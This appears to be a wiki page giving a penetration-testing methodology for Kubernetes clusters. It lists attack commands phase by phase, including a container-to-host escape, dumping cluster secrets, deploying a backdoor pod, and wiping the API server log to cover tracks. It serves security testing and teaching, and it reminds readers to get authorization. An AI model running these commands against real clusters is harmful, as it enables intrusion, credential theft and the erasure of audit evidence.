Container Testing Methodology

Kubernetes/Container Penetration Testing Methodology

1. Reconnaissance

Gather information about the target environment
Identify exposed services and endpoints

Commands:

# Scan for open ports
nmap -sV -p- <target_ip>

# Identify Kubernetes API server
curl -k https://<api_server_ip>:6443/version

# Enumerate subdomains
subfinder -d <domain>

2. Initial Access

Exploit exposed services
Gain a foothold in the cluster

Commands:

# Test for unauthenticated access to API server
kubectl --insecure-skip-tls-verify -s https://<api_server_ip>:6443 get pods

# Exploit known vulnerabilities (e.g., CVE-2018-1002105)
./cve-2018-1002105.sh https://<api_server_ip>:6443

3. Privilege Escalation

Escalate privileges within the cluster
Move laterally between pods/nodes

Commands:

# List service accounts and their permissions
kubectl get serviceaccounts
kubectl get clusterrolebindings

# Exploit overly permissive RBAC rules
kubectl --as=system:serviceaccount:default:default get secrets

# Escape container to host
docker run -v /:/host -it ubuntu chroot /host

4. Post-Exploitation

Access sensitive data
Maintain persistence
Pivot to other parts of the infrastructure

Commands:

# Access secrets
kubectl get secrets -o yaml

# Create backdoor pod
kubectl apply -f malicious-pod.yaml

# Exploit kubelet API for node access
curl -k https://<node_ip>:10250/pods

5. Covering Tracks

Remove evidence of intrusion
Clean up temporary files and logs

Commands:

# Delete pods
kubectl delete pod <compromised_pod>

# Clear logs
echo > /var/log/kubernetes/kube-apiserver.log

6. Reporting

Document findings
Provide remediation recommendations

Key Areas to Address:

Misconfigurations
Vulnerabilities in images or components
Overly permissive RBAC rules
Insecure network policies
Lack of encryption or proper authentication

Remember to always get proper authorization before performing any penetration testing activities.

PreviousKubernetes NextDropping Kali in your test space

Last updated 1 year ago

hashtagKubernetes/Container Penetration Testing Methodology

hashtag1. Reconnaissance

hashtagCommands:

hashtag2. Initial Access

hashtagCommands:

hashtag3. Privilege Escalation

hashtagCommands:

hashtag4. Post-Exploitation

hashtagCommands:

hashtag5. Covering Tracks

hashtagCommands:

hashtag6. Reporting

hashtagKey Areas to Address:

Kubernetes/Container Penetration Testing Methodology

1. Reconnaissance

Commands:

2. Initial Access

Commands:

3. Privilege Escalation

Commands:

4. Post-Exploitation

Commands:

5. Covering Tracks

Commands:

6. Reporting

Key Areas to Address: